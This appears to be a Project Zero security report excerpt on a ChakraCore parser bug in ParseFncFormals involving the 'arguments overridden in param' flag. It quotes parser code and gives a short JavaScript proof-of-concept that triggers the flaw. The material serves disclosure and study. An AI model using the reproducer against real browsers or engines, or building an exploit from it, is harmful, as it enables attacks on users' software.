<!--
|
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1298
|
|
|
|
Similar to issue #1297, but this time it happens in "Parser::ParseFncFormals" with the "PNodeFlags::fpnArguments_overriddenInParam" flag.
|
|
|
|
// Excerpt of Parser::ParseFncFormals as quoted in the report; each "..." marks code the report leaves out.
template<bool buildAST>
|
|
void Parser::ParseFncFormals(ParseNodePtr pnodeFnc, ParseNodePtr pnodeParentFnc, ushort flags)
|
|
{
|
|
...
|
|
// Branch for a formal that may be a destructuring pattern (feature enabled and parser at a possible pattern start).
if (IsES6DestructuringEnabled() && IsPossiblePatternStart())
|
|
{
|
|
...
|
|
// Instead of passing the STFormal all the way on many methods, it seems it is better to change the symbol type afterward.
// The loop walks the list starting at *ppNodeLex through sxVar.pnodeNext and re-types each symbol as STFormal.
for (ParseNodePtr lexNode = *ppNodeLex; lexNode != nullptr; lexNode = lexNode->sxVar.pnodeNext)
|
|
{
|
|
Assert(lexNode->IsVarLetOrConst());
|
|
UpdateOrCheckForDuplicateInFormals(lexNode->sxVar.pid, &formals);
|
|
lexNode->sxVar.sym->SetSymbolType(STFormal);
|
|
// A pattern binding named "arguments" marks the current function node as having "arguments" overridden by a parameter.
// NOTE(review): the flag is OR-ed into m_currentNodeFunc, not into the pnodeFnc argument of this call; the excerpt does
// not show whether both are guaranteed to name the same function node at this point. Confirm before relying on the flag.
if (m_currentNodeFunc != nullptr && lexNode->sxVar.pid == wellKnownPropertyPids.arguments)
|
|
{
|
|
m_currentNodeFunc->grfpn |= PNodeFlags::fpnArguments_overriddenInParam; <<------ HERE
|
|
}
|
|
}
|
|
...
|
|
...
|
|
}
|
|
|
|
PoC:
|
|
-->
|
|
|
|
// Reproducer from the report, kept verbatim as a parser regression input.
function f() {
|
|
// Destructuring assignment whose default value for "a" is an arrow function;
// the arrow function's only formal is the array pattern [arguments], i.e. a destructured parameter named "arguments".
({a = ([arguments]) => {
|
|
}} = 1);
|
|
|
|
// Property read on f's own arguments object, outside the arrow function.
// NOTE(review): presumably the statement that observes the flag set at the marked line in ParseFncFormals; the page does not state the resulting behaviour.
arguments.x;
|
|
}
|
|
|
|
f(); |